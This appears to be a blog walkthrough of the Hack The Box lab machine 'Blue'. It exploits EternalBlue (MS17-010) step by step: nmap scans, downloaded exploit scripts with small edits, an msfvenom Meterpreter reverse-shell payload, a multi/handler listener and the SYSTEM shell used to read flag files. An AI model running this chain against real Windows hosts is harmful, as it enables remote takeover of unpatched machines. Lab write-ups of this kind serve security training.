Eui Chul Chung

Vulnerability Researcher
PEN: OSCP, OSEP, OSCE3
WEB: OSWA, OSWE
EXP: OSED


Categories:

Tags:
Area of Interest:
Categories:
Vulnerabilities:



About

Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly.

Enumeration

Running the script portscan.sh reveals 2 attack vectors, RPC and SMB.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ sudo portscan.sh 10.129.142.78

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ cat PortScan\(10.129.142.78\)

PORT      STATE SERVICE     VERSION
135/tcp   open  msrpc       Microsoft Windows RPC
139/tcp   open  netbios-ssn Microsoft Windows netbios-ssn
445/tcp   open              Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc       Microsoft Windows RPC
49153/tcp open  msrpc       Microsoft Windows RPC
49154/tcp open  msrpc       Microsoft Windows RPC
49155/tcp open  msrpc       Microsoft Windows RPC
49156/tcp open  msrpc       Microsoft Windows RPC
49157/tcp open  msrpc       Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2023-09-26T07:51:36
|_  start_date: 2023-09-26T07:42:32
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-09-26T08:51:34+01:00
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: -19m51s, deviation: 34m37s, median: 7s

Exploitation

SMB

I’ll first check if the SMB service is vulnerable by running nmap scripts. From the result, we can check that the target is vulnerable to smb-vuln-ms17-010, which is the infamous SMB exploit EternalBlue.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ nmap 10.129.142.78 -p 139,445 --script=smb-vuln-*
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 04:03 EDT
Nmap scan report for 10.129.142.78
Host is up (0.13s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds

In order to exploit this vulnerability, I’ll download exploit scripts from MS17-010.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/mysmb.py

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/checker.py

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ wget -q https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py

Contrary to the results from nmap, the script checker.py reports that access to all named pipes are denied.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 checker.py 10.129.142.78
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

As this might be due to the null session being disabled, I’ll change the script to attempt a guest login instead.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ diff checker.py.bak checker.py
14c14
< USERNAME = ''
---
> USERNAME = 'guest'

By running the script checker.py once more with a guest login, I’m able to confirm that the target is indeed vulnerable to MS17-010.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 checker.py 10.129.142.78
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Now that we’ve confirmed the vulnerability, I’ll create a reverse shell payload that’ll be used with the exploit script send_and_execute.py.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe

Finally, by modifying and executing the script send_and_execute.py, the reverse shell payload gets uploaded to the target and then gets triggered by a service, which lends me a shell as the user NT AUTHORITY\SYSTEM.

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ diff send_and_execute.py.bak send_and_execute.py
37c37
< USERNAME = 'guest'
---
> USERNAME = ''

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ python2 send_and_execute.py 10.129.142.78 exploit.exe
Trying to connect to 10.129.142.78:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
No transaction struct in leak data
leak failed... try again
CONNECTION: 0xfffffa80019cd410
SESSION: 0xfffff8a0089c4060
FLINK: 0xfffff8a003e84048
InParam: 0xfffff8a003eab15c
MID: 0x4307
unexpected alignment, diff: 0x-27fb8
leak failed... try again
CONNECTION: 0xfffffa80019cd410
SESSION: 0xfffff8a0089c4060
FLINK: 0xfffff8a003ec3088
InParam: 0xfffff8a003ebd15c
MID: 0x4303
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 9KQXC9.exe...
Opening SVCManager on 10.129.142.78.....
Creating service IYAG.....
Starting service IYAG.....
The NETBIOS connection with the remote host timed out.
Removing service IYAG.....
ServiceExec Error on: 10.129.142.78
nca_s_proto_error
Done

┌──(m0nk3y@kali)-[~/HTB/Blue]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.142.78
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.142.78:49159) at 2023-09-26 04:24:22 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\haris\Desktop\user.txt'
84d2c82ec907404890f8885e8c4986f2

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
58389873203c25a924be4b506502a55b